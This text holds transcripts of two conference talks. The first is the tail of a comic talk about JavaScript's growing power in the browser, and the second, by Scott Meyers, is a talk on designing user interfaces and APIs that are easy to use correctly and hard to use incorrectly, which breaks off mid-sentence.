a document and then a little island of interactivity right there. And all the while I'm ignoring that JavaScript is happening, right? And I don't, JavaScript's a joke at this point. I'm not even thinking about it. I assume that's JavaScript, right? It's like, it's like Java, but it's scripty. I don't know. I assume that JavaScript was just typing alert, pond, into a text box. And that was JavaScript. This is a flowchart of working in JavaScript and what it's like. It's a really accurate flowchart for my friend Leon. So, but then people started doing stuff with JavaScript that was really more impressive. They were doing things like emulators. Like this is a Commodore 64 emulator in JavaScript. And then I started to realize that you could do some crazy stuff in JavaScript that was beyond anything that I had thought about. And I said to myself, maybe JavaScript is useful for more than just dropping tables from unsecured database inputs. So why not do something like this? This is Pascal Vallard's complete JavaScript Linux implementation. This is a full implementation of Linux written entirely in JavaScript emulating an Intel Panium processor, which could then allow me to come out to the command line here and then run an open source C compiler and then compile Hello World in C on JavaScript inside of a browser, which is awesome, but not deeply, deeply awesome. What would be really, really awesome would be opening up an iPhone on Windows and then going into mobile Safari and then opening up JavaScript Linux within that and then compiling the C stuff inside of JavaScript, inside of Safari, inside of an emulator on Windows machine running inside of a browser. Because it's the Internet. So at this point I was thinking to myself, maybe JavaScript is useful. Maybe I can do something fun with JavaScript. I'm not really sure. So we would go and do these crazy things in JavaScript and ask ourselves, what else could we do? And then this might be the part where you think I'm going to talk about OpenGL and Clang and you're going to assume, I guess Scott's going to probably show me like Quake in the browser. Is this the part of the talk where Scott shows Quake in the browser? No. No, that would be lame. I know you've seen Quake in the browser and I'm not going to show it to you because Tom Cruise says no. So then I realized that if you take the characteristics of JavaScript and then overlay it around the characteristics of an operating system that you could argue, you could argue, that JavaScript is an operating system. And then we've got a virtual machine now that ships with our browsers that we can then target. JavaScript is a lot more sophisticated than I think we realize. It is so sophisticated that we could then invoke Atwood's law, which says that any application that can be written in JavaScript will eventually be written in JavaScript. So you've got more operating systems than you realize. You've actually got another operating system on your pocket supercomputer. You've got your pocket supercomputer. I think I've probably lost mine. So now I need to go and find my pocket supercomputer app. And within that, I've got iOS and then I've got mobile Safari, which is its own operating system. And then people say we should write all our apps in HTML5. That would be great. But then this guy says that that's a bad idea. He says that HTML5 was a mistake. I don't think that's really cool. I think that HTML5 is happening. I think that I want to use one of another quote from a famous philosopher that the avalanche has already begun. It's too late for the pebbles to vote. When I think about CEOs going, I don't know, is really you think HTML5 is going to happen? I'm not really sure. Think about what it would be like to be a pebble and the mountain is coming down on top of you. Like, I don't really like this avalanche. Let's have a vote about that. Anyone remember who this was, this famous philosopher? No? Cosh, thank you. Babylon 5. Who said that? Nicely done. I'm surprised that there weren't enough nerds to clearly come up with that. So when we say HTML5, though, really HTML is nothing, right? HTML is kind of just a toy. It's CSS and JavaScript and ultimately JavaScript that does all the work. And of course, there's a lot more stuff around that that really makes JavaScript and the web work. There was a time, though, when HTML was the most complicated thing that you could learn and you could get a job based entirely on knowing HTML tables. You could be a homeless person and someone could say, do you know HTML tables? Yeah, I do. Boom, you're a junior engineer. And then they would say, do you know row span? I do know row span. Senior engineer. I know that in Netscape 4, the maximum number of tables that you can have nested is 32. And the only way that you know that is writing 33 tables and nesting them. Now, HTML these days is simpler than ever, right? It's just the structure. CSS provides the color and then CSS is great. We all love CSS, right? CSS is intuitive. It's fun. It's easy to use. It works everywhere. It's a well understood specification that we can all count on across browsers and across systems. And it's just super fun to work with. And it makes us happy on a regular, regular basis. And of course, we use JavaScript for everything else. And JavaScript is great. Now, today's JavaScript, as I'm trying to teach this gentleman at Intel, is great because it's a big language and there's a lot of complicated stuff there, but we don't even need to learn the bad parts. There's a book that just came out from John Ressig who wrote JQuery. And this is a great book called The JavaScript in Ninja. And the JavaScript Ninja book has a samurai on the cover because JavaScript is loosely typed. It doesn't really matter. Ninja, samurai. It's duck typing. It's a smattering of applause. No, I don't want your pity applause. If I can't earn it, I don't want it. So another one of our great philosophers once said that JavaScript is the assembly language of the web. Do you remember who that was? That was me. You're right. It was. But everyone else said it, too. It's just one of those things that you can't really tag credit for because everybody said it. And people, when I said this, they thought that I was trolling. They thought I was trying to cause trouble and Reddit got involved and I don't like trolls. They just localized this talk. I can't do a Norwegian accent, so I will be alternating between French and Russian when I do Norwegian people. So I wanted to figure out if JavaScript was, in fact, the assembly language of the web. So I went and I asked Brendan Eich who invented JavaScript if, in fact, it was true. And actually, that is Brendan Fraser, the actor. This is Brendan Eich. But Brendan Fraser is a beautiful man. So let's just look at Brendan Fraser. And actually speaking of beautiful people, I should take this opportunity to thank some of the really great people that have helped me around my time on the web and around learning JavaScript, learning HTML. People like Brendan Eich, John Resig, Denise Jacobs, who you may have seen around. Rachel Reese, who's been speaking here, who's doing a great job. Paul Irish, super cool, super cool guy. Uncle Bob, I'm not sure if Uncle Bob made it here. And then, of course, Douglas Crockford, who's a really awesome guy. All these people have helped me in my quest to become better. I want to make sure that I don't let too many layers hide complexity. This gentleman at Intel wanted to know if he should learn jQuery. And I was like, I don't know, if you add too many layers, you start to feel that you're slick and then something happens. And you don't want to try to be tricky. You try to be tricky, it's usually going to backfire on you. That's a great one. Let me see that one twice. Boom. So you could go and layer on top of all this JavaScript with a library like jQuery, but I don't think it's a good idea. Now, another famous quote is that no one writes JavaScript anymore, they just write jQuery. You know who said that, right? Jake Weary. Jake Weary actually said that. That is American actor Jake Weary. And then, of course, if you ever end up on the wrong page on Wikipedia, they will helpfully send you back there. Now, I don't know if you're familiar with Jake Weary. But here, let me fix that. There we go. Once you've learned that jQuery exists, I have ruined jQuery for you. You're never going to be able to go to work and talk about jQuery without thinking about jQuery. He's fantastic. Here's some of his work. I put this from IMDB. He was in Fred and Fred too, Night of the Living Fred. This is real. Escape from polygamy and zombievers, which is currently in post-production. So you can tell Jake is going places. Now, when you write stuff though in jQuery, you get an image in your mind about what you're going to build. And you think, I'm going to build this amazing thing and it's going to be awesome. I'm going to do it in jQuery. And then I build it and it doesn't quite look the way that I wanted it to be. I don't really know, like, whose fault is that? I don't really know whose fault. What happened? I don't know. And then I feel sad. And then I'm like, I don't even know. So I think that more people should spend time learning vanilla.js. So I'm going to show you a little vanilla.js here, which is amazing JavaScript library that I think is a little bit lighter weight than jQuery. The actor. And if you go check out vanilla.js, it's a lightweight cross-platform framework. And basically it's a way to do cross-platform. You can go and say, I want animations and I want Ajax. I want math libraries. And it will go and generate a JavaScript package for you. Now, it's a little larger GZipped. Now, when you're doing this in development, this is your path to vanilla.js. And then when it's time to move to production, just remove that. And it works fantastic. If you did not get that joke, then you'll get that joke later. That was a just-in-time joke. And there's a bit of a delay. It's kind of a joke grenade that will detonate later. Actually, a buddy of mine took him three days to figure that one out. So God bless him. So I wanted my friend to understand the power of the cloud meant you can have any language that you want. And you've got massive scale and portability and e-glasticity. And on the browser, you have a lot more power than you realize. These are pocket supercomputers with multiple processors. And you've got this integrated virtual machine that requires no plugins. JavaScript is its own operating system. You can run that. You can target JavaScript and do all sorts of crazy stuff. And then effectively put the user's machine to work and have your cloud not working so hard. So I guess my message to you as we get ready to hear from some more talented people than I is that you are very, very powerful. Not just because you have Thor, but just in general, you are developers. You are powerful. You are not obsolete. I was worried about that one, but I'm glad that that, I'm glad that went over well. You're not obsolete. You're still making the hits years later, making the hits. You know the cloud and you program the browser. So my message to you is get to work. Thank you very much. Thank you.
Scott thought a talk on JavaScript would be more fun, and less productive. You can google for his Productivity talk if you like.
10.5446/50636 (DOI)
All right, well, welcome to the last session of the day. At least the last session of the day for me. I'm amazed that there's this many people at the end of the day. So if you just stumbled in here thinking, well, maybe this is a good place to rest, I'll try not to wake you. My name is Scott Myers, and I want to talk about what I consider to be the single most important design guideline in working in software development. And I'll get right to it. Single most important design guideline, in my opinion, is to make interfaces easy to use correctly and hard to use incorrectly. Now, the reason I think it's the single most important design guideline is because this is not a user interface guideline. This is not an API guideline. This is both. It applies both to people implementing user interfaces, and it also applies to people who are implementing things that are being used by programmers, because there are a lot of interfaces in software. In fact, interface design in one form or another is one of the most common activities that we have as software developers. Now, often when people talk about interfaces, they're thinking about user interfaces. Could be a graphical user interface. Could be a gesture-based user interface. Could be a textual-based user interface. Those are all interfaces. But it also could be the kinds of interfaces that are used by software developers. So we have library interfaces. We have class interfaces. We have function interfaces. We have module interfaces. We have generic interfaces. We have template interfaces. There are lots and lots of interfaces. So a very common activity by software developers either is designing and implementing interfaces in one form or another, either for end users or for other developers or for both, or is consuming those interfaces, either as end users or as developers, people using APIs and things like that. It is because interfaces are, by its very nature of the word, they are literally the way that we interact with part of a system. A well-designed interface can make things go really smoothly, can make it very satisfying, can make it a very pleasant experience, either as an end user or a programmer. And a poorly designed interface, either at the application level or at the user level, can make things really a very miserable existence. Because it is so central to both using software and to developing software, this is why I think it is the single most important guideline that I know of. So I start as a point of departure with some assumptions. So the assumptions that I make are, first off, the people who are using software, either developers or end users, the first thing is they've used some software before. I think that's a reasonable assumption. They've interacted with some kind of a system before. So they have some idea what should be going on. The second thing is I believe that they are willing to read at least some documentation, not necessarily a lot of documentation. But they are willing to at least try to follow the rules. And most importantly, I believe that people who interact with interfaces, either as users or as developers, they want to succeed. They want things to work correctly. I do not know many software developers or many users who say, you know, I'm going to work today and I'm going to do a really bad job. That's my goal for today is to fail as many times as possible. I just don't think that's very common. So if these things are true, if people have some experience with software, if they're willing to read some documentation to figure out what the rules are, if they want to succeed, you can't ask them to bring anything more to the table. They're already pulling up their end of the bargain, which means if, for some reason, despite all these things, they use some software, they use an interface, and they fail. They do not do what they want to do. It's not their fault. It's your fault. Or in particular, it is the developer of the interfaces fault for having designed an interface that an experienced person willing to read some documentation who wants to succeed failed to succeed at. That's the sign of a bad interface. So as a result, software should be easy to use correctly and it should be hard to use incorrectly. So if it is possible to perform an action, and by perform an action, I could mean do a gesture on some kind of a handheld device, or do something with a mouse or a keyboard, or type in some kind of commands, or call a function interface, or instantiate a class or a template. These are all acts of interacting with an interface. If it is possible to do something through the interface, it should almost always do what the person who's doing it wants it to. And if somebody could try to do something which would not yield the desired behavior, then that action should typically not even be possible. You want to have an interface that fulfills what Rico Mariani has called the pit of success. The pit of success is if you are doing something and you trip and you fall, you accidentally land doing something that you wanted to do. So if you accidentally succeed with an interface somehow, it means that it just does the right thing. Because the things that we're not going to do the right thing aren't possible, and the things that are possible almost always do the right thing. That is the goal. What I want to do for the remainder of this presentation is try to give you more specific ideas on how you can implement easy to use correctly and hard to use incorrectly. I mean, it's one thing to say, well, this is what you should do, but the question is, how do you do it? What are the specific practices that you can adopt that will help make interfaces have this particular characteristic? And the first thing I want to talk about is adhering to what I call the principle of least astonishment. Everybody who comes to an interface, they have some expectations. They have some background. They have some experience, which means that they have expectations about how that interface is going to work. So your job as an interface designer is to maximize the likelihood that their expectations are correct. In many cases, they're going to guess at how to use the interface. Your job is to maximize the likelihood that the guesses are going to be correct. And I want to emphasize again, this is not a user interface guideline. This is not an API guideline. This is for both kinds of interfaces. So this should be true across the board. So if users know what they want to do, then they should be able to figure out how to do it. Now, this doesn't mean there's no innovation in interfaces. So if you come up with some clever new way to let people accomplish a particular task that's better than previous ways of doing it, that's fine. Even if people don't know how to use it initially, once they've learned how to use it, they should go, oh, now I understand. And their expectations from that point forward should now be something which is going to make it easy to use correctly and hard to use incorrectly. So this does not mean you have to stick with old ideas for interfaces. But it does mean that once you've gotten across the basic ideas, people should be able to figure out how things work. Now, over the years, I have collected a large number of examples of either interfaces that work or more frequently interfaces that do not work. I'm going to be showing a lot of examples. Some of them will be user interfaces. Some of them are going to be APIs. Some of them are going to be relatively old. Some of them are going to be relatively new. So in this case here, I just want to talk about some basic ideas of avoiding astonishment. So as an example, a lot of people don't even think about it anymore. And now that we're at Windows 8, maybe it doesn't even work this way. But for many, many years, if you wanted to shut down your Windows computer, you would click on Start. Now, I have actually read the blog entry where they described how they did a lot of user testing and how they finally came up with that clicking on Start was the right way to shut down the machine. This is stupid. Clicking on Start is not the right day to shut down the machine. And I've had to field more than my share of questions from people like my parents saying, so how do I shut down the machine? I'd say, you click on Start. And there's dead silence at the other end of the phone. No one wants to click on Start to stop something. I'm sorry, this does not make sense. Now, as I said, I read the blog entry describing how they came up with this. And what it boils down to was we tried a whole bunch of different approaches, and this one sucked the least. Guess what? Sucks least doesn't mean that is the best way to do things. So many, many years ago, and excuse me, I'm not a Mac user right now, but when I was using Macs from time to time, if you wanted to do things like get a DVD out of the drive or get a CD out of the drive, what you would do is you would drag it to the trash. Who thought this was a good idea? Who wanted to equate, destroy this forever with ejecting it? Now, when I learned about this, which was a number of years ago, quite a number of years ago, I was in graduate school, you don't always trust your colleagues in graduate school. They don't always have your best interests at heart. So at one point, I said, OK, how do I get this out of the machine? And somebody said, you drag it to the trash. And I said, you are lying to me. It cannot possibly be true. Windows XP, which is going back a while, but there will be newer examples, I promise. Windows XP had the option that you could choose your font size. Now, there were two selections by the operating system for the font size in Windows XP. Two selections, they ship with Windows XP. There was normal and large fonts. Those were your choices. And what I discovered one time, having tried to use large fonts, is large fonts breaks everything. Large fonts simply does not work. So I've got a couple of screenshots here. So you can see that, for example, in Excel, you'll notice that the baselines don't line up here. Notice that the name of the band here, this is Sponge, but the P in the GR, the descenders have been cut off and the CDs cut off on the back here. Basically, nothing displays correctly with large fonts. Call me naive. I was astonished that using one of two choices for the operating system font size made everything display incorrectly. Now, maybe I'm a little bit too picky, but it seems to me that you shouldn't get 50% of the choices wrong. I mean, there's two choices. And what I found from talking to Windows developers was it was widespread acknowledgement that it just did not work. I want to point out now that I'm going to be giving lots of different examples. Every single example that I'm going to be giving you is the result of somebody who said, let's ship this software, this is ready to go. I mean, it's easy to pick on things that people put together, they throw together in their backyard. But for example, regardless of what you think of Microsoft and Windows, it is a professional software product that a lot of people put spent money on. Somebody said, ship that baby, it's ready to go. Everything I'm going to be showing you here is the result of somebody having saying, I now believe this is a professional software product that has the appropriate level of quality and which will satisfy our users. On this slide, we've only seen user interfaces. It's going to get to APIs, I promise. This is not the kind of problem that is limited to just user interfaces. So now let's deal more with a developer level kind of thing. So this happens to be an example from QT 4.8. It's a Windows GUI kit that can be installed. So and what it says is the install path must not contain any spaces. Really? On an operating system that by default has program files and my documents, the installation path can't have any spaces. This is an example of people who develop some software on Unix where spaces are legal but almost never used. And then they said, now we'll port it over to Windows and we will bring our collective Unix baggage with us and we will then impose it on all our users. Now it goes the other direction as well. For example, it is not uncommon for people to take Windows software which is not case sensitive and then port it over to Unix and suddenly guess what? Everything starts breaking because it is case sensitive. When you move from one environment to another environment, the expectations that people have are going to change, which means what it means to make things easy to use correctly and hard to use incorrectly are going to change as well. You can't simply take your conception of what's a good idea and move it someplace else and expect that community of people to adapt to your way of doing things. You have to adapt to their way of doing things. Someone sent me this and it's so wonderful that I don't think anybody is ever going to beat this for the worst possible user interface design. Now this happens to be a calendar program. Oh, it's worse than you think. So this happens to be a calendar program. So if you have a recurring meeting on your calendar, like every Monday we have a meeting. And then let's suppose on some Monday you don't want to have the meeting. Maybe you're going to be on vacation. Maybe it's a holiday. Maybe the meeting got canceled for some other reason. So what you say is great. I want to delete the meeting. Now when you say that you want to delete the meeting, there's actually some inherent ambiguity here because you could be saying, I want to delete the meeting forever. We don't ever need to have it again. It's moved to Tuesdays. Or you could be saying, no, this one particular Monday is the day that it needs to go away. So all right, there needs to be some way to disambiguate between the two. So as you can see here, it says delete this single item. No to delete all. Now without even going any further, I have no idea what that means. So that's no to delete all, followed by um, abtzebrach, and tipensie, alf, x. And then two choices, ja and nine. You know, I didn't know what it meant in English. And putting it in German is not improving matters any. But I want to point out, professional software. Somebody shipped this, they thought this would be a great way to satisfy their customers. I'd call that fairly astonishing. So there are some things you can do to avoid astonishing people. One of the things is you want to avoid gratuitous incompatibilities with the surrounding environment. People are working in some environment, some kind of a social environment, some kind of a computational environment, some kind of a commute environment. They have expectations, they have normal standard practices. Your goal is to seamlessly work with those things that people are already used to doing. Basically, you want to take advantage of what people already know. That makes it easier for them to use your software. Again, whether they're end users or whether they're API users, as long as people's habits and expectations correspond to what should be done, you will have a higher rate of success with people doing things correctly. Now, the natural syntax for doing these things can vary depending on the environment. So for example, if I want to find out whether two objects in a programming language have the same value, it's a reasonable thing to want it, is this thing have the same value as this thing? But the way that you say that depends on the programming environment that you're dealing with. So for example, in C++, use operator equal equal, that's what is used in that programming language. Now, in Java, use equals with a lower case e. And in C sharp, use both equals with an upper case e and operator equal equal. So the way that you accomplish the same thing depends on the particular community that you are targeting. So this is why you need to adapt what you are doing to the community of people who are going to be using it. You also want to offer intuitive semantics. What I normally tell people is, if there's not a good reason to diverge from what people are used to, then you want to do what people are used to. So in C++ or other languages, when in doubt, do is the ints do. Everybody knows how an int behaves. So if you don't have a good reason for your type to not behave like an int, make it behave like an int. People know what that means. In GUIs, if you have mouse clicks or you have gestures, make those things mean whatever they normally mean in other programs that people use. Don't come up with your own special way of doing things unless there's a particular advantage associated with doing that. Again, I don't want to rule out interface innovation. That's clearly something we need to be able to experiment with. But in some cases, people just change things because they can change things and there's no obvious advantage. And that to me is a good way to astonish people. Anybody who is a software developer, anybody who is a programmer, at some point early in their career, early in their education, they were told, you need to choose good names. Yet they choose really good names. It's the most important thing, choose really good names. And every single person who has been given this advice has learned that all the good names were taken in the 1960s. There are no good names left. And yet, that's no excuse because names are, especially for APIs, they literally are the interface. The very first thing people see when they're dealing with an API are things like class names, module names, function names. The minute they see a word, they are going to go, oh, and an idea is going to spring to mind. And if the idea that springs to mind is not the right idea, you are going to be fighting them every step of the way because they have the wrong conception of what is going on. So it actually is really important to choose good names. And it's very hard. One of the reasons it's hard is because all the good names were taken in the 60s. But the second thing is there are so many things that have to be named. I mean, choosing one good name is hard. But we have to do things like choose names for libraries, modules, namespaces, generics. I'm not going to read the whole slide to you, but that's a lot of things that need names. Every one of them is supposed to be a good name. If all you did was pick names all day long, you'd go crazy. And yet, the fact that it's hard doesn't change. It's the fact that that is literally the interface for any kind of text-based system. The commands that people type on Unix, which is not setting any records in terms of beauty, the kinds of things people type in APIs, library names, commands to programs, the names are the interface for those kinds of interfaces. And to say things like, well, people will get used to it. Yeah, they will get used to it. But they'll make a lot of mistakes along the way. So it really is important to choose good names. I know it's hard. Doesn't mean it's not something we should all be aspiring to all the time. So here's a couple of counter examples. So this one happens to be from Adobe Acrobat 9, but it's actually standard for the Windows platform. So basically, let's suppose I create a document, I do some edits to it, and then I want to close the program without saving it. So now I have a document that's about to be destroyed without being saved. So the program thinks, all right, we should probably warn you about this. So what it says is, do you want to save the changes to the document? Yes, I know what that means. No, I know what that means. Cancel, I never have any idea what that means. I have to always think and go, what's the difference between no and cancel again? And I go, all right, cancel means I actually want to cancel the request to close the program. So that doesn't help me too much. But that's OK. We have interface innovation. So open office, I downloaded the most recent version of that. Open office, not constrained to do things like everybody else does. If you do the same thing in open office, it asks you the same question. So do you want to save the dot? Do you want to, what does it say? Do you want to save your changes? Well, it doesn't have yes, no, and cancel. That's too complicated. It has save. Well, I actually knew what yes meant, so that doesn't help me too much. And then it has discard. Well, OK, but I knew what no meant. And then we have cancel. That's what I had trouble with in the first place. So it's different, but I don't happen to think it's any better. Now, there is this notion in the interface community of what is known as the Gulf of Execution. The Gulf of Execution is the distance between conceptually what I wish to be able to do and the means I have to take in order to get it done. The distance between what I want to express and the way that I go about expressing that. And so anytime the Gulf of Execution is large, it increases the likelihood that somebody's going to do the wrong kind of thing. So for example, somebody might click on either discard or no when they should have clicked on cancel, because they really didn't want to lose the document. It is interesting from time to time to think about how we could avoid the problem. As an example, one could imagine that rather than even presenting this dialogue in the first place, if you try to exit a program and you hadn't saved the document, automatically it would just be saved behind the scenes. You wouldn't have been asked, it would just be there. And then we'd have to have some kind of interface that would let people go, oh, right, I wanted that document. Oh, you saved it for me? That's so nice. Why don't you give it to me? Other interface questions come up, but the point is that there are other ways to approach the problem. For example, rather than saying, I'm about to throw your document away, how about don't throw the document away? And then as I said, there has to be some other kind of interface which would let us get back at those kind of old documents. But by trying to reduce the gulf of execution between, oh, I just want to get out of the program and I'm about to throw a bunch of work away, by adopting a different approach, we can possibly make that tension be lessened. The other thing I would ask about this particular kind of thing, and this is designed for a desktop environment, so this is not designed for a small screen, I'm trying to figure out why it is in 2014 where we have these giant monitors with huge numbers of pixels, we're still following the convention that we can't have more than one short word on the button. For example, instead of cancel, something like don't exit program, I bet that would fit, in which case a lot of the confusion about what it means would go away as well. So this is an example of an interface in my mind that was designed in the late 1990s and has not been updated since then. So we've seen too many GUI examples, let's talk a little bit about API examples, and this has to do again with choosing good names. Now, in the C++ standard library, there are two different ways to determine if objects are the same. One of them is called equality, one of them is called equivalence, doesn't even matter what the difference is. But the point is, there's two ways to say, is this object equal to this object? There's two ways to say that. One of them is to use equality and one of them is to use equivalence. So it turns out that they have a function called equal range. Takes a bunch of objects in a range and says, I want you to bunch all of them together, whose values are equivalent. So the name of the function is equal range, but it doesn't use equality. It uses equivalence and it does make a difference sometimes. And people do get misled into thinking, oh, now I have all the values that are equal to something else, but actually they don't. They have the values that are equivalent to something else, not always the same. So the question really is, why did they call it equal range and not equivalent range, since it's not using equality? Another thing you can do to avoid astonishing people, one of the most important things is, you can embrace consistency. You can have consistency in the wording that you use, in the way that you lay things out, in the way you report errors, things like that. So this is an example that was sent to me a while ago. This happens to be from an ATM. And what you will notice in this ATM is that there's two things you can deposit. You can do a cash deposit and you can do a check deposit. Notice that on the screen, the cash deposit's on the left and the check deposit's on the right. And now notice that underneath where you actually do the depositing, so the cash deposit is on the right and the check deposit is on the left. Or as I like to say, you know, they had a 50% chance of getting it right, which means they had a 100% chance of getting it wrong. But, I mean, this was only rolled out to probably tens of thousands of places around the world. So, really? I mean, is that so complicated to make sure that things are consistent in terms of their visual, their spatial layout? Also, in terms of consistency, in Java, if you would like to find out how many elements are in a container, there's three ways to do it. So, if you have an array, use the length property. If you have a string, use the length method. And if you have a list, use the size method. Three different ways to get the same kind of information. That's Java. So, Microsoft looked at Java and said, man, this is crazy. Three different ways to get the same information. What kind of loser company would have three ways to get the same information? So, when they invented.NET, they said, we will not have three ways to get the same information. We'll have two. So, if you want to know how many elements are in a container, you have the length property for arrays, and you have the count property for array list. You also have a count method on Ianuma. Pardon me? You also have a count method on Ianuma, so it's actually the same. I'm sorry, one more time? The count method also exists. On what? On Ianuma. Oh, count method or count property? Method. OK, all right. So, on Ianuma, then, so there actually are three different ways? Cool. I'll just make a little note here. You think I'm making it up? Ianumerable? Count method. OK, remember, professional released software products. These are people who are doing the best that they possibly can. But that now is withstanding. So, we have a situation now. Sometimes when I talk to people, they say, look, you know, especially in.NET, everybody's using Visual Studio, and it's got completion, so all you have to do is type the first letter of the method name or the property name. It'll tell you what it happens to be. So my first observation is, number one, L and C are not the same letter. So you actually have to find out what that's going to be. The other thing is this makes the assumption that you're always using an IDE. But these kinds of languages also have reflection-based code. With reflection-based code, you can actually be generating and processing code at runtime. And guess what? At runtime, there's no IDE. Instead, what you have to do is take a look at something and then query its interface to find out what kinds of things it supports. And guess what? That querying becomes a lot more complicated and error-prone if you have to check for two or three different possibilities. So the excuse of, well, we have an environment that makes these problems go away, bad news. It doesn't make the problems go away. It might reduce the severity in some cases, but it doesn't solve them completely. Again, on the topic of consistency, this is from the C standard library. So we have three different functions here. We've got F scan F, we have F get pause, and we have F seek. Notice that all three of them take a file pointer parameter as the first parameter. All right, so we notice a pattern here. When you're dealing with files, you will pass in a file pointer as the first parameter. All right, that's easy to remember. Oh, wait. It turns out there's also F get, F put C, and free open. It also takes a file pointer as the last parameter. I have talked to several extremely experienced C programmers, people who do this for a living. They've done it for decades. And they will all say they have to look it up every single time. I mean, they simply cannot memorize this stuff. And there's a lovely quote here that has been said, this is something which I think is important to keep in mind. This inconsistency has frustrated millions of developers for more than 30 years. And the reason I point this out is, if you are involved in the development of an interface that is so successful that it is used by millions of people for decades, wouldn't it be nice if one of the things that is remembered for is how easy it was to use and how you didn't have to look up the details every single time you wanted to use it? Now, most of us will never be sufficiently lucky to develop an interface that has that kind of widespread use. But shouldn't you aspire to something which can stand the test of time and which people are going to look back and say, you know, that was a really nice interface. That's supposed to look it up every single time I want to make a function call. It's kind of crazy. So this is a different kind of consistency. This is from the C++ standard library. And again, I'm trying to mix up API things and GUI things. There's a number of standard containers in the C++ standard library. So let's suppose you have a container. And what you want to do is you want to get rid of all the elements of the container that have a particular value. I want to get rid of all the 10s. Or I want to get of, I don't know, all the colors that are blue, whatever it happens to be. So if it's a set, you call erase. If it's a multi-set, you call erase. If it's a map, if it's a multi-map, you call erase. If it's an unordered set, unordered multi-set, unordered map, unordered multi-map, you call erase. I'm beginning to notice a trend here. If it's a list, you call remove. And if it's a forward list, you call remove. By the way, they do exactly the same operation. They're just named differently. And what's important to notice about these kinds of examples, the thing about consistency, usually things that are inconsistent, it's an utterly arbitrary decision. You cannot argue that these names had to be different for some compelling technical reason. They're just different because they probably were developed independently. And then when somebody noticed that they were inconsistent, they didn't bother to fix it. They didn't say, now, now, before we standardize this, let's make sure that they actually behave in a consistent fashion. So some problems have technical justifications. This is not one of them. I've talked about consistency in layout, spatially in a GUI, for example. I've talked about consistency in terms of calling forms. But there's a different kind of consistency I want to mention now because consistency is across the board. It should occur in many different domains. So again, this is from the C++ standard library. So there is a function sort. If you call sort on a collection of values, either it will sort it in n log n time or it will not compile. So for example, if you have a doubly linked list, which cannot be sorted using this algorithm in n log n time, and you try to sort the doubly linked list, it will not compile. So the philosophy there is if we can't do this efficiently, we won't even support it. Your program won't compile. That's the philosophy. Now, there is another function. It's called binary search. Binary search in the same standard library. It will run in log n time, which is what you'd expect from binary search if it can. And if it can't run in log n time, it will run in linear time. You can invoke binary search on a linked list. This is an inconsistency in philosophy because this philosophy says if there's any way to do this, we will do it, even if it's really slow. But what that means is that the library is a whole for your typical developer working in C++. It means that when they make a function call, they don't know if it's going to compile. And if it does compile, they don't know if it's going to be fast or slow in general. Because the people designing the library didn't have a consistent set of philosophies about what it would mean to have performance guarantees. So this is not a syntactic constraint. This is more of a philosophical conceptual inconsistency. And that kind of inconsistency is no better or worse than any other kind of inconsistency. Another thing from the C++ standard library, and some of you may not know, that I sort of live in the C++ world. So that's why some of the examples are coming from that. There is a function called sort. When you sort values, the sort technique can either be stable or unstable. It doesn't matter what the words mean. But the point is there's two ways to do it, stable or unstable. The sort algorithm is not guaranteed to be stable. But that's OK. If you need stability, there's another algorithm. Stable sort, which is guaranteed to be stable. Well, this makes sense so far. Sort, not guaranteed to be stable. Stable sort, guaranteed to be stable. However, there is also a special algorithm for sorting doubly linked lists. It is called sort, and it's guaranteed to be stable. So we've now talked about consistency. We've talked about avoiding surprising people. I want to now talk a little bit about progressive disclosure. Remember, the high level goal we're trying to achieve here is interfaces that are easy to use correctly and hard to use incorrectly. When you get to an interface of a particular level of complexity, and again, whether it's a user interface or an API, once there are a whole bunch of choices that people can make, a whole bunch of possible things they can do, the likelihood of them doing the wrong thing increases. If you're faced with a whole wall of buttons, the chances of hitting the wrong button go up. So what we'd like to do is find a way to reduce the likelihood that people are going to hit the wrong button. And one of the ways to do that is what is known as progressive disclosure. What progressive disclosure does is it says, listen, of all these choices that people have, of all the things that they could do, these are the ones they probably want to do, and these are the ones that they are much less likely to want to do. Now, we need to make all of them available all the time, but what we can do is make it easy to hit the buttons or use the levers that we want people to use, because it's likely to be what they want, and harder to use it some other ones. So what you can do is distinguish normal from expert or advanced level kinds of commands. So this is something that happens to be from the most recent version of Firefox, but you've got some choices here, but notice there's an advanced button, and when you click on the advanced button, it brings up a whole bunch more options. The idea here is that for most people when they're in, well, which section is this? Content, it looks like. When you're in the content section here, these are the things that you probably want to work with, but there are some other options for people who are more advanced, in which case they can click on the advanced button and then some more options pop up. The idea is to minimize the likelihood that somebody's just clicking on buttons and gets themselves all messed up by having the user interface designer distinguish between the elementary stuff and the more advanced stuff. I want to point out that progressive disclosure is not the same as categorizing things. So this is from a different program called super. This is a fairly complicated looking interface with all kinds of options, and they're separated in the colors and dissections, but the point is all the options are still there on one screen. There's nothing there which says this is probably what you want to do, and this is probably not what you want to do. So there's nothing wrong with categorization. Categorization serves a lot of really useful purposes, but just bear in mind categorization is not the same as progressive disclosure. Progressive disclosure is a way of hiding things from people initially because they are unlikely to want to use them. It's a way of making things harder to get at. And it's not something which is limited to user interface design. So if I have an object which has, let's say, 100 methods, number one, I've got a problem already, but I've have an object with 100 methods, and 20 of them are likely to be used a lot, and the other 80 are for very specialized cases, rather than having a single 100 method object, what I can do instead is break it into two objects where one object has the 20 methods that I probably want to use, and the other object actually holds the other 80 methods, so I have to ask for that sub-object in order to get access to those methods. Now, a number of years ago, Ken Arnold, actually almost 10 years ago, wrote an article called Programmers Are People Too, and it was based on the observation that a lot of work is put into user interface design to make it easier for people to use programs, but at the underlying programming level, people are often presented with these very large, complicated APIs that are easy to use incorrectly, and his observation was, why don't we do the same kind of thing with programmers that we do with regular end users? Let's also shield them for this kind of complexity. So the example he talked about was Java Swing's JButton class, which he says it offers over 100 methods, but he pointed out of those greater than 100 methods, about maybe 15 are the ones that most people dealing with buttons most of the time are likely to want to manipulate, and all the other buttons just get people in trouble and lead to a lot more debugging for their programs, so he proposed a better design, which essentially involved taking the JButton class, breaking it into smaller pieces, and the smaller pieces would then be used as sub-objects, so if you wanted to get access to some of these lesser used options, you actually would have to ask for a sub-object, which meant that it was less likely that casual users were going to get themselves into trouble. It's progressive disclosure, but it's at the API level. Another thing you can do to make interfaces easy to use correctly and hard to use incorrectly is simply to document them before you implement them. If you write up the documentation for interface, whether it's a user interface or whether it's an API, before you've actually implemented the interface, you are likely to find problems of the kind we've talked about so far. For example, if things are inconsistent, when you start writing about it, you begin to notice that they're inconsistent. If things are overly complicated to try to explain to people, then they probably need to be simplified. So if there are bad names, so if a name seems to say one thing but actually says something else, you have a chance to change the name. And this whole idea of writing documentation before you actually write the code is completely consistent, for example, with test-driven development, where you are writing the test cases before you're writing the code itself. But it 